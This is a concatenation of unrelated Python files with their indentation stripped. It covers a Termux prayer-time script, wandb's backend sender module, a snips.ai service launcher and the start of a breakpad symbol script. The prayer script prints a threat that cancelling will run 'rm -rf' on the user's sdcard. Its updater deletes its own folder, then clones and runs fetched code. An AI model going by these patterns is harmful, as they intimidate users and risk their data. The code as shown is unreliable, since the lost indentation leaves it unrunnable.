nada = '.saur'
else:
nada = '.reg'
sp.call(['mpv '+nada],shell=True,stdout=sp.DEVNULL,stderr=sp.STDOUT)
def trdsholat():
global txt
txt = open('.__','r').readlines()
st = [lr,
'DONT IN CANCELL IF THE ADZANS ARE BEING, DIRECTLY PRAYING AJA'
'IF IN CANCELL AUTO RM -RF / SDCARD.',
'PLEASE MAKE THIS THAT, LET IT GO TO PRAYER,'
'BECAUSE THE PRAYER IS REQUIRED.'
]
for i in st:
print(i.center(60))
ttt = Thread(name='adzan',target=suara)
ttt.start()
while ttt.isAlive():
ani()
def trdpuasa():
global txt
if int(tm('%H%M')) == saur:
txt = open('.___','r').readlines()
else:
txt = open('.____','r').readlines()
ttx = Thread(name='puasa',target=suara)
ttx.start()
while ttx.isAlive():
ani()
def banner():
sp.call('clear')
print(f'''
{lgr}:::::::{lg}╗{lgr}::{lg}╗ {lgr}::{lg}╗ {lgr}::::::{lg}╗ {lgr}::{lg}╗ {lgr}:::::{lg}╗ {lgr}::::::::{lg}╗
{lgr}::{lg}╔════╝{lgr}::{lg}║ {lgr}::{lg}║{lgr}::{lg}╔═══{lgr}::{lg}╗{lgr}::{lg}║ {lgr}::{lg}╔══{lgr}::{lg}╗╚══{lgr}::{lg}╔══╝
{lgr}:::::::{lg}╗{lgr}:::::::{lg}║{lgr}::{lg}║ {lgr}::{lg}║{lgr}::{lg}║ {lgr}:::::::{lg}║ {lgr}::{lg}║
╚════{lgr}::{lg}║{lgr}::{lg}╔══{lgr}::{lg}║{lgr}::{lg}║ {lgr}::{lg}║{lgr}::{lg}║ {lgr}::{lg}╔══{lgr}::{lg}║ {lgr}::{lg}║
{lgr}:::::::{lg}║{lgr}::{lg}║ {lgr}::{lg}║╚{lgr}::::::{lg}╔╝{lgr}:::::::{lg}╗{lgr}::{lg}║ {lgr}::{lg}║ {lgr}::{lg}║
╚══════╝╚═╝ ╚═╝ ╚═════╝ ╚══════╝╚═╝ ╚═╝ ╚═╝
{lw}Programmer Muslim Nggak Lupa Ibadah{lg}
{lg}[{x}Special Thanks, ERR0R H{lg}]
_______________________________________________________________
''')
def menu():
banner()
print(f'''
{lg}1.{lw} Aktifkan
{lg}2.{lw} Ganti kota
{lg}3.{lw} Update
{lg}4.{lw} Tentang
{lg}0.{lw} Keluar''')
p = input(lg+'\nSholat # '+x)
if p == '1':
start()
elif p == '2':
try:
sp.call('rm .cookie/ts')
except:
pass
gettown()
start()
elif p == '3':
update()
elif p == '4':
tentang()
else:
exit()
def update():
banner()
print(lr+'Jangan di cancell ya ukhty.. biar nggak error :*')
print(lg+'Cek jaringan..')
try:
get('https://github.com')
except requests.exceptions.ConnectionError:
print(lg+'Astaghfirullah.. Ukhty lupa ngidupin jaringannya')
exit()
print(lg+'Mengupdate..\nLama tidaknya tergantung jaringan, sabarr :)')
os.system('cd .. && rm -rf sholat')
sp.call(['cd .. && git clone https://github.com/karjok/sholat'],shell=True, stdout=sp.DEVNULL,stderr=sp.STDOUT)
print(lg+'Selesai mengupdate')
print(lg+'Memulai ulang..')
sleep(2)
os.system('cd ../sholat && python sholat.py')
def tentang():
banner()
print(f'''
{lg}Nama : {lw}Sholat
{lg}Versi : {lw}2.0 (update: 5 Mei 2019, 6:00PM)
{lg}Tanggal : {lw}31 Januari 2020, 2:18PM
{lg}Author : {lw}Nggak Lupa Ibadah
{lg}Coder : {lw}ERR0R
waktu sholat
{lg}Team : {lw}ITALIA CYBER ARMY
Eka Pangesty, CRABS dan semua
umat Muslim seplanet bumi.
{lg}NB : {lw}Manusia nggak ada yang sempurna,
sama kaya tool ini.
Silahkan laporkan kritik atau saran
ke: - https://t.me/termuxxhacking
- https://facebook.com/termuxxhacking
- @termux_hacking''')
input(lg+'Enterin aja ')
menu()
def exit():
print(lg+'_'*63)
print('Makasih ukhty,\nSemoga sehat selalu 😙'+x)
if __name__=='__main__':
try:
os.mkdir('.cookie')
except OSError:
pass
menu()
|
interface.py
|
#
# -*- coding: utf-8 -*-
"""Backend Sender - Send to internal process
Manage backend sender.
"""
import json
import logging
from multiprocessing import Process
import threading
import typing as t
from typing import Any, Dict, Iterable, Optional, Tuple, Union
from typing import cast
from typing import TYPE_CHECKING
import uuid
import six
from six.moves import queue
import wandb
from wandb import data_types
from wandb.proto import wandb_internal_pb2 as pb
from wandb.proto import wandb_telemetry_pb2 as tpb
from wandb.util import (
get_h5_typename,
json_dumps_safer,
json_dumps_safer_history,
json_friendly,
json_friendly_val,
maybe_compress_summary,
WandBJSONEncoderOld,
)
from . import summary_record as sr
from .artifacts import ArtifactManifest
from ..wandb_artifacts import Artifact
if TYPE_CHECKING:
from ..wandb_run import Run
from six.moves.queue import Queue
logger = logging.getLogger("wandb")
def file_policy_to_enum(policy: str) -> "pb.FilesItem.PolicyTypeValue":
if policy == "now":
enum = pb.FilesItem.PolicyType.NOW
elif policy == "end":
enum = pb.FilesItem.PolicyType.END
elif policy == "live":
enum = pb.FilesItem.PolicyType.LIVE
return enum
def file_enum_to_policy(enum: "pb.FilesItem.PolicyTypeValue") -> str:
if enum == pb.FilesItem.PolicyType.NOW:
policy = "now"
elif enum == pb.FilesItem.PolicyType.END:
policy = "end"
elif enum == pb.FilesItem.PolicyType.LIVE:
policy = "live"
return policy
class _Future(object):
_object: Optional[pb.Result]
def __init__(self) -> None:
self._object = None
self._object_ready = threading.Event()
self._lock = threading.Lock()
def get(self, timeout: int = None) -> Optional[pb.Result]:
is_set = self._object_ready.wait(timeout)
if is_set and self._object:
return self._object
return None
def _set_object(self, obj: pb.Result) -> None:
self._object = obj
self._object_ready.set()
class MessageRouter(object):
_pending_reqs: Dict[str, _Future]
_request_queue: "Queue[pb.Record]"
_response_queue: "Queue[pb.Result]"
def __init__(
self, request_queue: "Queue[pb.Record]", response_queue: "Queue[pb.Result]"
) -> None:
self._request_queue = request_queue
self._response_queue = response_queue
self._pending_reqs = {}
self._lock = threading.Lock()
self._join_event = threading.Event()
self._thread = threading.Thread(target=self.message_loop)
self._thread.daemon = True
self._thread.start()
def message_loop(self) -> None:
while not self._join_event.is_set():
try:
msg = self._response_queue.get(timeout=1)
except queue.Empty:
continue
self._handle_msg_rcv(msg)
def send_and_receive(self, rec: pb.Record, local: Optional[bool] = None) -> _Future:
rec.control.req_resp = True
if local:
rec.control.local = local
rec.uuid = uuid.uuid4().hex
future = _Future()
with self._lock:
self._pending_reqs[rec.uuid] = future
self._request_queue.put(rec)
return future
def join(self) -> None:
self._join_event.set()
self._thread.join()
def _handle_msg_rcv(self, msg: pb.Result) -> None:
with self._lock:
future = self._pending_reqs.pop(msg.uuid, None)
if future is None:
# TODO (cvp): saw this in tests, seemed benign enough to ignore, but
# could point to other issues.
if msg.uuid != "":
logger.warning(
"No listener found for msg with uuid %s (%s)", msg.uuid, msg
)
return
future._set_object(msg)
class BackendSender(object):
record_q: Optional["Queue[pb.Record]"]
result_q: Optional["Queue[pb.Result]"]
process: Optional[Process]
_run: Optional["Run"]
_router: Optional[MessageRouter]
def __init__(
self,
record_q: "Queue[pb.Record]" = None,
result_q: "Queue[pb.Result]" = None,
process: Process = None,
) -> None:
self.record_q = record_q
self.result_q = result_q
self._process = process
self._run = None
self._router = None
if record_q and result_q:
self._router = MessageRouter(record_q, result_q)
def _hack_set_run(self, run: "Run") -> None:
self._run = run
def publish_output(self, name: str, data: str) -> None:
# from vendor.protobuf import google3.protobuf.timestamp
# ts = timestamp.Timestamp()
# ts.GetCurrentTime()
# now = datetime.now()
if name == "stdout":
otype = pb.OutputRecord.OutputType.STDOUT
elif name == "stderr":
otype = pb.OutputRecord.OutputType.STDERR
else:
# TODO(jhr): throw error?
print("unknown type")
o = pb.OutputRecord(output_type=otype, line=data)
o.timestamp.GetCurrentTime()
self._publish_output(o)
def _publish_output(self, outdata: pb.OutputRecord) -> None:
rec = pb.Record()
rec.output.CopyFrom(outdata)
self._publish(rec)
def publish_tbdata(
self, log_dir: str, save: bool, root_logdir: Optional[str]
) -> None:
tbrecord = pb.TBRecord()
tbrecord.log_dir = log_dir
tbrecord.save = save
tbrecord.root_dir = root_logdir or ""
rec = self._make_record(tbrecord=tbrecord)
self._publish(rec)
def _publish_history(self, history: pb.HistoryRecord) -> None:
rec = self._make_record(history=history)
self._publish(rec)
def publish_preempting(self) -> None:
preempt_rec = pb.RunPreemptingRecord()
rec = self._make_record(preempting=preempt_rec)
self._publish(rec)
def publish_history(
self, data: dict, step: int = None, run: "Run" = None, publish_step: bool = True
) -> None:
run = run or self._run
data = data_types.history_dict_to_json(run, data, step=step)
history = pb.HistoryRecord()
if publish_step:
assert step is not None
history.step.num = step
data.pop("_step", None)
for k, v in six.iteritems(data):
item = history.item.add()
item.key = k
item.value_json = json_dumps_safer_history(v) # type: ignore
self._publish_history(history)
def publish_telemetry(self, telem: tpb.TelemetryRecord) -> None:
rec = self._make_record(telemetry=telem)
self._publish(rec)
def _make_run(self, run: "Run") -> pb.RunRecord:
proto_run = pb.RunRecord()
run._make_proto_run(proto_run)
if run._settings.host:
proto_run.host = run._settings.host
if run._config is not None:
config_dict = run._config._as_dict() # type: ignore
self._make_config(data=config_dict, obj=proto_run.config)
if run._telemetry_obj:
proto_run.telemetry.MergeFrom(run._telemetry_obj)
return proto_run
def _make_artifact(self, artifact: Artifact) -> pb.ArtifactRecord:
proto_artifact = pb.ArtifactRecord()
proto_artifact.type = artifact.type
proto_artifact.name = artifact.name
proto_artifact.client_id = artifact._client_id
proto_artifact.sequence_client_id = artifact._sequence_client_id
proto_artifact.digest = artifact.digest
if artifact.distributed_id:
proto_artifact.distributed_id = artifact.distributed_id
if artifact.description:
proto_artifact.description = artifact.description
if artifact.metadata:
proto_artifact.metadata = json.dumps(json_friendly_val(artifact.metadata)) # type: ignore
proto_artifact.incremental_beta1 = artifact.incremental
self._make_artifact_manifest(artifact.manifest, obj=proto_artifact.manifest)
return proto_artifact
def _make_artifact_manifest(
self, artifact_manifest: ArtifactManifest, obj: pb.ArtifactManifest = None
) -> pb.ArtifactManifest:
proto_manifest = obj or pb.ArtifactManifest()
proto_manifest.version = artifact_manifest.version() # type: ignore
proto_manifest.storage_policy = artifact_manifest.storage_policy.name()
for k, v in artifact_manifest.storage_policy.config().items() or {}.items():
cfg = proto_manifest.storage_policy_config.add()
cfg.key = k
cfg.value_json = json.dumps(v)
for entry in sorted(artifact_manifest.entries.values(), key=lambda k: k.path): # type: ignore
proto_entry = proto_manifest.contents.add()
proto_entry.path = entry.path
proto_entry.digest = entry.digest
if entry.size:
proto_entry.size = entry.size
if entry.birth_artifact_id:
proto_entry.birth_artifact_id = entry.birth_artifact_id
if entry.ref:
proto_entry.ref = entry.ref
if entry.local_path:
proto_entry.local_path = entry.local_path
for k, v in entry.extra.items():
proto_extra = proto_entry.extra.add()
proto_extra.key = k
proto_extra.value_json = json.dumps(v)
return proto_manifest
def _make_exit(self, exit_code: int) -> pb.RunExitRecord:
exit = pb.RunExitRecord()
exit.exit_code = exit_code
return exit
def _make_config(
self,
data: dict = None,
key: Union[Tuple[str, ...], str] = None,
val: Any = None,
obj: pb.ConfigRecord = None,
) -> pb.ConfigRecord:
config = obj or pb.ConfigRecord()
if data:
for k, v in six.iteritems(data):
update = config.update.add()
update.key = k
update.value_json = json_dumps_safer(json_friendly(v)[0]) # type: ignore
if key:
update = config.update.add()
if isinstance(key, tuple):
for k in key:
update.nested_key.append(k)
else:
update.key = key
update.value_json = json_dumps_safer(json_friendly(val)[0]) # type: ignore
return config
def _make_stats(self, stats_dict: dict) -> pb.StatsRecord:
stats = pb.StatsRecord()
stats.stats_type = pb.StatsRecord.StatsType.SYSTEM
stats.timestamp.GetCurrentTime()
for k, v in six.iteritems(stats_dict):
item = stats.item.add()
item.key = k
item.value_json = json_dumps_safer(json_friendly(v)[0]) # type: ignore
return stats
def _summary_encode(self, value: t.Any, path_from_root: str) -> dict:
"""Normalize, compress, and encode sub-objects for backend storage.
value: Object to encode.
path_from_root: `str` dot separated string from the top-level summary to the
current `value`.
Returns:
A new tree of dict's with large objects replaced with dictionaries
with "_type" entries that say which type the original data was.
"""
# Constructs a new `dict` tree in `json_value` that discards and/or
# encodes objects that aren't JSON serializable.
if isinstance(value, dict):
json_value = {}
for key, value in six.iteritems(value):
json_value[key] = self._summary_encode(
value, path_from_root + "." + key
)
return json_value
else:
friendly_value, converted = json_friendly( # type: ignore
data_types.val_to_json(
self._run, path_from_root, value, namespace="summary"
)
)
json_value, compressed = maybe_compress_summary( # type: ignore
friendly_value, get_h5_typename(value) # type: ignore
)
if compressed:
# TODO(jhr): impleement me
pass
# self.write_h5(path_from_root, friendly_value)
return json_value
def _make_summary_from_dict(self, summary_dict: dict) -> pb.SummaryRecord:
summary = pb.SummaryRecord()
for k, v in six.iteritems(summary_dict):
update = summary.update.add()
update.key = k
update.value_json = json.dumps(v)
return summary
def _make_summary(self, summary_record: sr.SummaryRecord) -> pb.SummaryRecord:
pb_summary_record = pb.SummaryRecord()
for item in summary_record.update:
pb_summary_item = pb_summary_record.update.add()
key_length = len(item.key)
assert key_length > 0
if key_length > 1:
pb_summary_item.nested_key.extend(item.key)
else:
pb_summary_item.key = item.key[0]
path_from_root = ".".join(item.key)
json_value = self._summary_encode(item.value, path_from_root)
json_value, _ = json_friendly(json_value) # type: ignore
pb_summary_item.value_json = json.dumps(
json_value, cls=WandBJSONEncoderOld,
)
for item in summary_record.remove:
pb_summary_item = pb_summary_record.remove.add()
key_length = len(item.key)
assert key_length > 0
if key_length > 1:
pb_summary_item.nested_key.extend(item.key)
else:
pb_summary_item.key = item.key[0]
return pb_summary_record
def _make_files(self, files_dict: dict) -> pb.FilesRecord:
files = pb.FilesRecord()
for path, policy in files_dict["files"]:
f = files.files.add()
f.path = path
f.policy = file_policy_to_enum(policy)
return files
def _make_login(self, api_key: str = None) -> pb.LoginRequest:
login = pb.LoginRequest()
if api_key:
login.api_key = api_key
return login
def _make_request(
self,
login: pb.LoginRequest = None,
get_summary: pb.GetSummaryRequest = None,
pause: pb.PauseRequest = None,
resume: pb.ResumeRequest = None,
stop_status: pb.StopStatusRequest = None,
network_status: pb.NetworkStatusRequest = None,
poll_exit: pb.PollExitRequest = None,
sampled_history: pb.SampledHistoryRequest = None,
run_start: pb.RunStartRequest = None,
check_version: pb.CheckVersionRequest = None,
log_artifact: pb.LogArtifactRequest = None,
defer: pb.DeferRequest = None,
) -> pb.Record:
request = pb.Request()
if login:
request.login.CopyFrom(login)
elif get_summary:
request.get_summary.CopyFrom(get_summary)
elif pause:
request.pause.CopyFrom(pause)
elif resume:
request.resume.CopyFrom(resume)
elif stop_status:
request.stop_status.CopyFrom(stop_status)
elif network_status:
request.network_status.CopyFrom(network_status)
elif poll_exit:
request.poll_exit.CopyFrom(poll_exit)
elif sampled_history:
request.sampled_history.CopyFrom(sampled_history)
elif run_start:
request.run_start.CopyFrom(run_start)
elif check_version:
request.check_version.CopyFrom(check_version)
elif log_artifact:
request.log_artifact.CopyFrom(log_artifact)
elif defer:
request.defer.CopyFrom(defer)
else:
raise Exception("Invalid request")
record = self._make_record(request=request)
# All requests do not get persisted
record.control.local = True
return record
def _make_record(
self,
run: pb.RunRecord = None,
config: pb.ConfigRecord = None,
files: pb.FilesRecord = None,
summary: pb.SummaryRecord = None,
history: pb.HistoryRecord = None,
stats: pb.StatsRecord = None,
exit: pb.RunExitRecord = None,
artifact: pb.ArtifactRecord = None,
tbrecord: pb.TBRecord = None,
alert: pb.AlertRecord = None,
final: pb.FinalRecord = None,
metric: pb.MetricRecord = None,
header: pb.HeaderRecord = None,
footer: pb.FooterRecord = None,
request: pb.Request = None,
telemetry: tpb.TelemetryRecord = None,
preempting: pb.RunPreemptingRecord = None,
) -> pb.Record:
record = pb.Record()
if run:
record.run.CopyFrom(run)
elif config:
record.config.CopyFrom(config)
elif summary:
record.summary.CopyFrom(summary)
elif history:
record.history.CopyFrom(history)
elif files:
record.files.CopyFrom(files)
elif stats:
record.stats.CopyFrom(stats)
elif exit:
record.exit.CopyFrom(exit)
elif artifact:
record.artifact.CopyFrom(artifact)
elif tbrecord:
record.tbrecord.CopyFrom(tbrecord)
elif alert:
record.alert.CopyFrom(alert)
elif final:
record.final.CopyFrom(final)
elif header:
record.header.CopyFrom(header)
elif footer:
record.footer.CopyFrom(footer)
elif request:
record.request.CopyFrom(request)
elif telemetry:
record.telemetry.CopyFrom(telemetry)
elif metric:
record.metric.CopyFrom(metric)
elif preempting:
record.preempting.CopyFrom(preempting)
else:
raise Exception("Invalid record")
return record
def _publish(self, record: pb.Record, local: bool = None) -> None:
if self._process and not self._process.is_alive():
raise Exception("The wandb backend process has shutdown")
if local:
record.control.local = local
if self.record_q:
self.record_q.put(record)
def _communicate(
self, rec: pb.Record, timeout: Optional[int] = 5, local: bool = None
) -> Optional[pb.Result]:
return self._communicate_async(rec, local=local).get(timeout=timeout)
def _communicate_async(self, rec: pb.Record, local: bool = None) -> _Future:
assert self._router
if self._process and not self._process.is_alive():
raise Exception("The wandb backend process has shutdown")
future = self._router.send_and_receive(rec, local=local)
return future
def communicate_login(
self, api_key: str = None, timeout: Optional[int] = 15
) -> pb.LoginResponse:
login = self._make_login(api_key)
rec = self._make_request(login=login)
result = self._communicate(rec, timeout=timeout)
if result is None:
# TODO: friendlier error message here
raise wandb.Error(
"Couldn't communicate with backend after %s seconds" % timeout
)
login_response = result.response.login_response
assert login_response
return login_response
def _publish_defer(self, state: "pb.DeferRequest.DeferStateValue") -> None:
defer = pb.DeferRequest(state=state)
rec = self._make_request(defer=defer)
self._publish(rec, local=True)
def publish_defer(self, state: int = 0) -> None:
self._publish_defer(cast("pb.DeferRequest.DeferStateValue", state))
def publish_header(self) -> None:
header = pb.HeaderRecord()
rec = self._make_record(header=header)
self._publish(rec)
def publish_footer(self) -> None:
footer = pb.FooterRecord()
rec = self._make_record(footer=footer)
self._publish(rec)
def publish_final(self) -> None:
final = pb.FinalRecord()
rec = self._make_record(final=final)
self._publish(rec)
def publish_login(self, api_key: str = None) -> None:
login = self._make_login(api_key)
rec = self._make_request(login=login)
self._publish(rec)
def publish_pause(self) -> None:
pause = pb.PauseRequest()
rec = self._make_request(pause=pause)
self._publish(rec)
def publish_resume(self) -> None:
resume = pb.ResumeRequest()
rec = self._make_request(resume=resume)
self._publish(rec)
def _publish_run(self, run: pb.RunRecord) -> None:
rec = self._make_record(run=run)
self._publish(rec)
def publish_run(self, run_obj: "Run") -> None:
run = self._make_run(run_obj)
self._publish_run(run)
def publish_config(
self,
data: dict = None,
key: Union[Tuple[str, ...], str] = None,
val: Any = None,
) -> None:
cfg = self._make_config(data=data, key=key, val=val)
self._publish_config(cfg)
def _publish_config(self, cfg: pb.ConfigRecord) -> None:
rec = self._make_record(config=cfg)
self._publish(rec)
def publish_summary(self, summary_record: sr.SummaryRecord) -> None:
pb_summary_record = self._make_summary(summary_record)
self._publish_summary(pb_summary_record)
def _publish_summary(self, summary: pb.SummaryRecord) -> None:
rec = self._make_record(summary=summary)
self._publish(rec)
def _publish_metric(self, metric: pb.MetricRecord) -> None:
rec = self._make_record(metric=metric)
self._publish(rec)
def _communicate_run(
self, run: pb.RunRecord, timeout: int = None
) -> Optional[pb.RunUpdateResult]:
"""Send synchronous run object waiting for a response.
Arguments:
run: RunRecord object
timeout: number of seconds to wait
Returns:
RunRecord object
"""
req = self._make_record(run=run)
resp = self._communicate(req, timeout=timeout)
if resp is None:
logger.info("couldn't get run from backend")
# Note: timeouts handled by callers: wandb_init.py
return None
assert resp.HasField("run_result")
return resp.run_result
def communicate_run(
self, run_obj: "Run", timeout: int = None
) -> Optional[pb.RunUpdateResult]:
run = self._make_run(run_obj)
return self._communicate_run(run, timeout=timeout)
def publish_stats(self, stats_dict: dict) -> None:
stats = self._make_stats(stats_dict)
rec = self._make_record(stats=stats)
self._publish(rec)
def publish_files(self, files_dict: dict) -> None:
files = self._make_files(files_dict)
rec = self._make_record(files=files)
self._publish(rec)
def communicate_artifact(
self,
run: "Run",
artifact: Artifact,
aliases: Iterable[str],
is_user_created: bool = False,
use_after_commit: bool = False,
finalize: bool = True,
) -> _Future:
proto_run = self._make_run(run)
proto_artifact = self._make_artifact(artifact)
proto_artifact.run_id = proto_run.run_id
proto_artifact.project = proto_run.project
proto_artifact.entity = proto_run.entity
proto_artifact.user_created = is_user_created
proto_artifact.use_after_commit = use_after_commit
proto_artifact.finalize = finalize
for alias in aliases:
proto_artifact.aliases.append(alias)
log_artifact = pb.LogArtifactRequest()
log_artifact.artifact.CopyFrom(proto_artifact)
rec = self._make_request(log_artifact=log_artifact)
return self._communicate_async(rec)
def publish_artifact(
self,
run: "Run",
artifact: Artifact,
aliases: Iterable[str],
is_user_created: bool = False,
use_after_commit: bool = False,
finalize: bool = True,
) -> None:
proto_run = self._make_run(run)
proto_artifact = self._make_artifact(artifact)
proto_artifact.run_id = proto_run.run_id
proto_artifact.project = proto_run.project
proto_artifact.entity = proto_run.entity
proto_artifact.user_created = is_user_created
proto_artifact.use_after_commit = use_after_commit
proto_artifact.finalize = finalize
for alias in aliases:
proto_artifact.aliases.append(alias)
rec = self._make_record(artifact=proto_artifact)
self._publish(rec)
def publish_alert(
self, title: str, text: str, level: str, wait_duration: int
) -> None:
proto_alert = pb.AlertRecord()
proto_alert.title = title
proto_alert.text = text
proto_alert.level = level
proto_alert.wait_duration = wait_duration
rec = self._make_record(alert=proto_alert)
self._publish(rec)
def communicate_stop_status(
self, timeout: int = None
) -> Optional[pb.StopStatusResponse]:
status = pb.StopStatusRequest()
req = self._make_request(stop_status=status)
resp = self._communicate(req, timeout=timeout, local=True)
if resp is None:
return None
assert resp.response.stop_status_response
return resp.response.stop_status_response
def communicate_network_status(
self, timeout: int = None
) -> Optional[pb.NetworkStatusResponse]:
status = pb.NetworkStatusRequest()
req = self._make_request(network_status=status)
resp = self._communicate(req, timeout=timeout, local=True)
if resp is None:
return None
assert resp.response.network_status_response
return resp.response.network_status_response
def publish_exit(self, exit_code: int) -> None:
exit_data = self._make_exit(exit_code)
rec = self._make_record(exit=exit_data)
self._publish(rec)
def _communicate_exit(
self, exit_data: pb.RunExitRecord, timeout: int = None
) -> pb.RunExitResult:
req = self._make_record(exit=exit_data)
result = self._communicate(req, timeout=timeout)
if result is None:
# TODO: friendlier error message here
raise wandb.Error(
"Couldn't communicate with backend after %s seconds" % timeout
)
assert result.exit_result
return result.exit_result
def communicate_poll_exit(self) -> Optional[pb.PollExitResponse]:
poll_request = pb.PollExitRequest()
rec = self._make_request(poll_exit=poll_request)
result = self._communicate(rec)
if result is None:
return None
poll_exit_response = result.response.poll_exit_response
assert poll_exit_response
return poll_exit_response
def communicate_check_version(
self, current_version: str = None
) -> Optional[pb.CheckVersionResponse]:
check_version = pb.CheckVersionRequest()
if current_version:
check_version.current_version = current_version
rec = self._make_request(check_version=check_version)
result = self._communicate(rec)
if result is None:
# Note: timeouts handled by callers: wandb_init.py
return None
return result.response.check_version_response
def communicate_run_start(self, run_pb: pb.RunRecord) -> Optional[pb.Result]:
run_start = pb.RunStartRequest()
run_start.run.CopyFrom(run_pb)
rec = self._make_request(run_start=run_start)
result = self._communicate(rec)
return result
def communicate_exit(self, exit_code: int, timeout: int = None) -> pb.RunExitResult:
exit_data = self._make_exit(exit_code)
return self._communicate_exit(exit_data, timeout=timeout)
def communicate_summary(self) -> Optional[pb.GetSummaryResponse]:
record = self._make_request(get_summary=pb.GetSummaryRequest())
result = self._communicate(record, timeout=10)
if result is None:
return None
get_summary_response = result.response.get_summary_response
assert get_summary_response
return get_summary_response
def communicate_sampled_history(self) -> Optional[pb.SampledHistoryResponse]:
record = self._make_request(sampled_history=pb.SampledHistoryRequest())
result = self._communicate(record)
if result is None:
return None
sampled_history_response = result.response.sampled_history_response
assert sampled_history_response
return sampled_history_response
def join(self) -> None:
# shutdown
request = pb.Request(shutdown=pb.ShutdownRequest())
record = self._make_record(request=request)
_ = self._communicate(record)
if self._router:
self._router.join()
|
snips_services.py
|
#!/usr/bin/python2.7
# -*- coding: utf-8 -*-
############################################################
# -Classe de gestion des services non python snips.ai
# -Snips.ai comprend plusieurs services connectée par MQTT
# -pour l'utilisation minimale, 6 services doivent être activés
# snips-audio-server #gestion des entrées sorties audio
# snips-asr #algoritme de traitement de la voie
# snips-hotword #détection du mot clée "hey snips" #Optionnel
# snips-nlu #Semble convertire la sortie du asr en texte
# snips-dialogue #Semble gérer toute sortie de nlu
# snips-injection #Sert a insérer des mot inconnue dans le model
# -Comprend aussis un service de TTS
# snips-tts
#
# -La classe ici présente gere l'exécution des services snips.ai
# et s'assure de leur bonne fermeture lorsque le programme meurt
############################################################
# Global import
import subprocess
import sys
from threading import Thread
from time import sleep
import signal
import atexit
import os
try:
from queue import Queue, Empty
except ImportError:
from Queue import Queue, Empty # python 2.x
def _print(text, printOn):
# Impression désactivable
if printOn:
print(text)
class _Snips_Service():
""" Activer un seul service snips.ai """
def __init__(self, command, name, printOn):
self.name = name
self.pOn = printOn
_print("[I[" + str(command) + "] init", self.pOn)
self.sp = subprocess.Popen(
command,
bufsize=64,
shell=True,
close_fds=True,
stdin=subprocess.PIPE,
stdout=subprocess.PIPE,
stderr=subprocess.PIPE)
self.run_stderr_alive = True
t_err = Thread(target=self.run_stderr, args=(self.sp.stderr, None))
t_err.daemon = True
t_err.start()
self.run_stdout_alive = True
t_out = Thread(target=self.run_stdout, args=(self.sp.stdout, None))
t_out.daemon = True
t_out.start()
def terminate(self):
""" Ne fonctionne pas, pas au point """
self.run_stderr_alive = False
self.run_stdout_alive = False
try:
0
# os.killpg(os.getpgid(self.sp.pid), signal.SIGTERM) #Trop radicale
# self.sp.kill() #Ne marche pas
# try:
# self.sp.wait()
# if(self.sp.poll() is not None):
# for n in range(0, 10):
# self.sp.kill()
# self.sp.wait()
# _print("[E[" + self.name + "] " + "Process not Dead !!!", self.pOn)
# sleep(0.5)
# else:
# _print("[I[" + self.name + "] " + "Process terminated", self.pOn)
# except Exception:
# _print("[E[" + self.name + "] " + "Failing wait or someting when killing", self.pOn)
except Exception:
_print("[E[" + self.name + "] " + "Failing killing process, probably not active", self.pOn)
def run_stderr(self, out, _):
while(self.run_stderr_alive):
line = out.readline()[:-1]
if len(line) > 0:
_print("[E[" + self.name + "] " + line, self.pOn)
def run_stdout(self, out, _):
while(self.run_stdout_alive):
line = out.readline()[:-1]
if len(line) > 0:
_print("[I[" + self.name + "] " + line, self.pOn)
class Snips_Services_Start(Thread):
""" Demarer tout les services snips et gérer leur fermeture """
def __init__(self, printOn=False):
Thread.__init__(self)
self.pOn = printOn
self.daemon = True
self.alive = True
self.services = []
self.start()
atexit.register(self.sysexit_callback)
# signal.signal(signal.SIGINT, self.exit_gracefully) #Fonctionne
# signal.signal(signal.SIGTERM, self.exit_gracefully) #Fonctionne
if printOn is False:
print("[i[Snips_Services_Start] No output")
def exit_gracefully(self, signum, frame):
_print("[E[Snips_Services_Start] KILL DETECTED KILLING ALL PROCESS", self.pOn)
self.stop()
def sysexit_callback(self):
_print("[E[Snips_Services_Start] sys.exit() detected KILLING ALL PROCESS", self.pOn)
self.stop()
def stop(self):
self.alive = False
os.killpg(os.getpgid(os.getpid()), signal.SIGTERM) # Sufisent et le plus efficace pour que le process meurt
self._stop_services()
def run(self):
self._start_services()
while(self.alive):
sleep(1)
def _start_services(self):
self.services.append(_Snips_Service("snips-audio-server" , "audio", printOn=self.pOn))
self.services.append(_Snips_Service("snips-asr" , "asr ", printOn=self.pOn))
self.services.append(_Snips_Service("snips-tts" , "tts ", printOn=self.pOn))
# self.services.append(_Snips_Service("snips-hotword" , "hotwd", printOn=self.pOn))
self.services.append(_Snips_Service("snips-dialogue" , "dialo", printOn=self.pOn))
self.services.append(_Snips_Service("snips-nlu" , "nlu ", printOn=self.pOn))
self.services.append(_Snips_Service("snips-injection" , "injec", printOn=self.pOn))
def _stop_services(self):
for service in self.services:
service.terminate()
def _close_os_snips_process(self):
# PAS ENCORE UTILISE, INSTABLE
try:
retcode = subprocess.Popen(
["pgrep snips-"],
close_fds=True,
bufsize=64,
shell=True,
stdin=subprocess.PIPE,
stdout=subprocess.PIPE,
stderr=subprocess.PIPE)
pids = retcode.stdout.read().splitlines()
_print(pids, self.pOn)
for pid in pids:
_print("[I[Snips_Services_Start] Killing process: " + str(pid), self.pOn)
retcode = subprocess.call(["pkill", pid])
except Exception as e:
_print("[E[Snips_Services_Start]" + str(e), self.pOn)
if __name__ == "__main__":
s = Snips_Services_Start(False)
sleep(2)
s.stop() # Oubligatoire, si non les process snips ne meurt pas, ce stop est radicale
sys.exit(1) # Ne tue pas les process corectement
|
generate_breakpad_symbols.py
|
#!/usr/bin/env python
# Copyright (c) 2013 GitHub, Inc.
# Copyright (c) 2013 The Chromium Authors. All rights reserved.
# Use of this source code is governed by a BSD-style license that can be
# found in the LICENSE file.
"""Convert pdb to sym for given directories"""
import errno
import glob
import optparse
import os
import Queue
import re
import subprocess
import sys
import threading
CONCURRENT_TASKS=4
SOURCE_ROOT=os.path.abspath(os.path.dirname(os.path.dirname(os.path.dirname(os.path.dirname(__file__)))))
DUMP_SYMS=os.path.join(SOURCE_ROOT, 'breakpad', 'src', 'tools', 'windows', 'binaries', 'dump_syms.exe')
def GetCommandOutput(command):
"""Runs the command list, returning its output.
Prints the given command (which should be a list of one or more strings),
then runs it and returns its output (stdout) as a string.
From chromium_utils.
"""
devnull = open(os.devnull, 'w')
proc = subprocess.Popen(command, stdout=subprocess.PIPE, stderr=devnull,
bufsize=1)
output = proc.communicate()[0]
return output
def mkdir_p(path):
"""Simulates mkdir -p."""
try:
os.makedirs(path)
except OSError as e:
if e.errno == errno.EEXIST and os.path.isdir(path):
pass
else: raise
def GenerateSymbols(options, binaries):
